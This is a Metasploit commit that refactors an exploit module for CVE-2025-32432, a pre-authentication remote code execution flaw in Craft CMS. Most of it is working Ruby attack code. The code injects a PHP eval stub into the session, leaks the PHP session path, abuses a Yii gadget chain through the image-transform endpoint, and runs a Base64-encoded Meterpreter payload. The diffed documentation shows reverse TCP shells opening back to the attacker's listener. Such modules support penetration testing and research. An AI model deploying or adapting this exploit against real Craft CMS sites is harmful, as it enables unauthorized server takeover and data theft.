Refactor module: modularization, session-path leak, randomized key, improved check

Chocapikk · Chocapikk · commit 39a5d710aaea · 2025-04-30T00:24:25.000+02:00
- Centralized fetch_cookies_and_csrf and execute_via_session methods for clarity - Added leak_session_path() to call send_transform("phpinfo") and parse session.save_path via XPath - In check(): first try to leak the PHP session directory (report vulnerable if successful), then perform a simple RCE check by summing two 4-digit random numbers with print_r() - Stub injection now happens once in fetch_cookies_and_csrf; execute_via_session only needs the payload - Randomized the "as hack" key in send_transform - Simplified exploit() to reuse execute_via_session with a Base64-encoded payload - Big thanks to @jvoisin for the suggestions!
diff --git a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
@@ -144,15 +144,15 @@ msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options
 
 Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   ASSET_ID   60               yes       Existing asset ID
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT      80               yes       The target port (TCP)
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                yes       Base path
-   VHOST                       no        HTTP server virtual host
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   ASSET_ID  410              yes       Existing asset ID
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
+                                        etasploit.html
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                      no        HTTP server virtual host
 
 
 Payload options (php/meterpreter/reverse_tcp):
@@ -169,18 +169,20 @@ Exploit target:
    --  ----
    0   PHP In-Memory
 
+
+
 View the full module info with the info, or info -d command.
 ```
 
 ```bash
 msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. License text detected
-[*] Making initial request to push payload and get a CSRF token..
-[*] Triggering code via assets/generate-transform
+[+] Leaked session.save_path: /var/lib/php/sessions
+[+] The target is vulnerable. Session path leaked
+[*] Injecting stub & triggering payload...
 [*] Sending stage (40004 bytes) to 172.24.0.2
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.24.0.2:42740) at 2025-04-26 05:00:08 +0200
+[*] Meterpreter session 12 opened (192.168.1.36:4444 -> 172.24.0.2:35238) at 2025-04-29 21:52:44 +0200
 
 meterpreter > sysinfo
 Computer    : exploit-craft-web
@@ -198,11 +200,11 @@ payload => cmd/linux/http/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. License text detected
-[*] Making initial request to push payload and get a CSRF token..
-[*] Triggering code via assets/generate-transform
+[+] Leaked session.save_path: /var/lib/php/sessions
+[+] The target is vulnerable. Session path leaked
+[*] Injecting stub & triggering payload...
 [*] Sending stage (3045380 bytes) to 172.24.0.2
-[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.24.0.2:47562) at 2025-04-26 05:02:02 +0200
+[*] Meterpreter session 13 opened (192.168.1.36:4444 -> 172.24.0.2:33436) at 2025-04-29 21:53:43 +0200
 
 meterpreter > sysinfo
 Computer     : 172.24.0.2
diff --git a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -20,7 +20,6 @@ def initialize(info = {})
           in Craft CMS versions 3.x, 4.x, and 5.x < 5.6.17 via the image transform endpoint.
           It injects a PHP Meterpreter payload into the Craft session, then triggers its execution
           by abusing the Yii behavior gadget chain (PhpManager) on the generate-transform endpoint.
-
           Discovered in the wild by Orange Cyberdefense CSIRT and assigned CVE-2025-32432.
         },
         'Author' => [
@@ -62,112 +61,57 @@ def initialize(info = {})
       )
     )
 
-    register_options(
-      [
-        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
-        OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(2..3)])
-      ]
-    )
-  end
-
-  def check
-    csrf_token = fetch_cookies_and_csrf
-    return CheckCode::Unknown('Could not retrieve cookies & CSRF') if csrf_token.nil?
-
-    vprint_status "Using CSRF token: #{csrf_token}"
-
-    response = send_transform(csrf_token, datastore['ASSET_ID'], 'phpinfo')
-    return CheckCode::Unknown('No response from generate-transform') if response.nil?
-
-    if response.body.include?('If you did not receive a copy of the PHP license')
-      CheckCode::Vulnerable('License text detected')
-    else
-      CheckCode::Safe('License text not detected')
-    end
+    register_options([
+      OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(2..3)])
+    ])
   end
 
-  def php_exec_cmd(encoded_payload)
-    generator = Rex::RandomIdentifier::Generator.new
-    disabled_var = "$#{generator[:dis]}"
-    payload_b64 = Rex::Text.encode_base64(encoded_payload)
+  def execute_via_session(payload)
+    session_id, csrf, param_name = fetch_cookies_and_csrf
+    return nil unless csrf
 
-    <<~PHP
-      #{php_preamble(disabled_varname: disabled_var)}
-      $c=base64_decode("#{payload_b64}");
-      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
-    PHP
-  end
-
-  def exploit
-    payload_code = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-    encoded_payload = framework.encoders
-                               .create('php/base64')
-                               .encode(payload_code)
-
-    random_param = Rex::Text.rand_text_alphanumeric(5..12)
-    initial_payload = "<?php eval($_GET['#{random_param}']);die();"
-
-    print_status 'Making initial request to push payload and get a CSRF token'
-    session_id, csrf_token = fetch_cookies_and_csrf(initial_payload)
-    unless csrf_token
-      fail_with(Failure::Unknown, 'Could not retrieve session ID and CSRF token')
-    end
+    vprint_status("Session ID: #{session_id} – stub injected under param #{param_name}")
 
-    vprint_status "Session ID: #{session_id}"
-    vprint_status "CSRF token: #{csrf_token}"
+    session_dir = @session_path || '/var/lib/php/sessions'
+    session_file = normalize_uri(session_dir, "sess_#{session_id}")
 
-    print_status 'Triggering code via assets/generate-transform'
-    request_payload = {
+    body = {
       assetId: datastore['ASSET_ID'],
       handle: {
         width: Rex::Text.rand_text_numeric(1..5),
         height: Rex::Text.rand_text_numeric(1..5),
-        'as hack' => {
+        "as #{Rex::Text.rand_text_alphanumeric(1..8)}" => {
           class: 'craft\\behaviors\\FieldLayoutBehavior',
           __class: 'yii\\rbac\\PhpManager',
           '__construct()' => [
-            { itemFile: "/var/lib/php/sessions/sess_#{session_id}" }
+            { itemFile: session_file }
           ]
         }
       }
     }.to_json
 
-    send_request_cgi!(
+    send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param => encoded_payload },
-      'headers' => { 'X-CSRF-Token' => csrf_token },
+      'vars_get' => {
+        'p' => 'actions/assets/generate-transform',
+        param_name => payload
+      },
+      'headers' => { 'X-CSRF-Token' => csrf },
       'ctype' => 'application/json',
-      'data' => request_payload,
+      'data' => body,
       'keep_cookies' => true
     )
   end
 
-  def extract_csrf_token(res)
-    get_token = lambda do |r|
-      next unless r&.code == 200
-
-      r.get_html_document.at("//input[@name='CRAFT_CSRF_TOKEN']/@value")&.text
-    end
-
-    token = get_token.call(res)
-
-    if token.nil? || token.empty?
-      vprint_status 'CSRF not found, falling back to root'
-      fb_res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'index.php'),
-        'keep_cookies' => true
-      )
-      token = get_token.call(fb_res)
-    end
-
-    token unless token.nil? || token.empty?
-  end
+  def fetch_cookies_and_csrf
+    param_name = Rex::Text.rand_text_alphanumeric(5..12)
+    static_stub = "<?=eval($_GET['#{param_name}']);die()?>"
 
-  def fetch_cookies_and_csrf(payload_param = nil)
-    rand_param = Rex::Text.rand_text_alphanumeric(5..12)
-    params = { 'p' => 'admin/dashboard', rand_param => payload_param }.compact
+    params = {
+      'p' => 'admin/dashboard',
+      param_name => static_stub
+    }
 
     cookie_jar.clear
     res = send_request_cgi(
@@ -178,9 +122,8 @@ def fetch_cookies_and_csrf(payload_param = nil)
     )
     return nil unless res
 
-    raw_cookies = res.get_cookies.to_s
-    session_id = raw_cookies.scan(/CraftSessionId=([^;]+)/).flatten.first
-    return nil if session_id.nil? || session_id.empty?
+    session_id = res.get_cookies[/CraftSessionId=([^;]+)/, 1]
+    return nil if session_id.to_s.empty?
 
     if res.code == 302 && res.headers['Location']
       res = send_request_cgi(
@@ -190,10 +133,41 @@ def fetch_cookies_and_csrf(payload_param = nil)
       )
     end
 
-    token = extract_csrf_token(res)
-    return nil unless token
+    csrf = extract_csrf_token(res)
+    return nil unless csrf
+
+    [session_id, csrf, param_name]
+  end
+
+  def extract_csrf_token(res)
+    doc = res.get_html_document
+    token = doc.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+    return token unless token.to_s.empty?
+
+    vprint_status('CSRF not found in dashboard, falling back to root')
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'keep_cookies' => true
+    )
+    res2.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+  end
+
+  def leak_session_path(csrf)
+    res = send_transform(csrf, datastore['ASSET_ID'], 'phpinfo')
+    return nil unless res&.body
+
+    doc = res.get_html_document
+
+    path = doc.at_xpath(
+      "//tr[td[@class='e' and normalize-space(text())='session.save_path']]/td[@class='v']"
+    )&.text
 
-    payload_param ? [session_id, token] : token
+    path ||= doc.at_xpath(
+      "//h2[normalize-space(text())='Session Save Path']/following-sibling::p[1]"
+    )&.text
+
+    path&.strip
   end
 
   def send_transform(csrf, asset_id, php_string)
@@ -202,12 +176,10 @@ def send_transform(csrf, asset_id, php_string)
       'handle' => {
         'width' => Rex::Text.rand_text_numeric(1..5),
         'height' => Rex::Text.rand_text_numeric(1..5),
-        'as session' => {
+        "as #{Rex::Text.rand_text_alphanumeric(1..8)}" => {
           'class' => 'craft\\behaviors\\FieldLayoutBehavior',
           '__class' => 'GuzzleHttp\\Psr7\\FnStream',
-          '__construct()' => [
-            []
-          ],
+          '__construct()' => [[]],
           '_fn_close' => php_string
         }
       }
@@ -222,4 +194,54 @@ def send_transform(csrf, asset_id, php_string)
       'data' => json_data
     )
   end
+
+  def check
+    _, csrf, = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve session & CSRF') unless csrf
+
+    if (path = leak_session_path(csrf))
+      @session_path = path
+      print_good("Leaked session.save_path: #{@session_path}")
+      return CheckCode::Vulnerable('Session path leaked')
+    end
+
+    a = Rex::Text.rand_text_numeric(4).to_i
+    b = Rex::Text.rand_text_numeric(4).to_i
+
+    expr = "#{a}+#{b}"
+    sum = a + b
+    print_status("Checking RCE: #{expr}")
+
+    payload = "print_r(#{expr});"
+    res = execute_via_session(payload)
+    return CheckCode::Unknown('No response') unless res
+
+    if res.body.include?(sum.to_s)
+      CheckCode::Vulnerable("Detected RCE: #{sum}")
+    else
+      CheckCode::Safe("Sum #{sum} not found")
+    end
+  end
+
+  def exploit
+    raw = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64 = Rex::Text.encode_base64(raw)
+
+    payload_code = "eval(base64_decode('#{b64}'));"
+
+    print_status('Injecting stub & triggering payload...')
+    execute_via_session(payload_code)
+  end
+
+  def php_exec_cmd(encoded_payload)
+    gen = Rex::RandomIdentifier::Generator.new
+    disabled_var = "$#{gen[:dis]}"
+    b64 = Rex::Text.encode_base64(encoded_payload)
+
+    <<~PHP
+      #{php_preamble(disabled_varname: disabled_var)}
+      $c=base64_decode("#{b64}");
+      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
+    PHP
+  end
 end
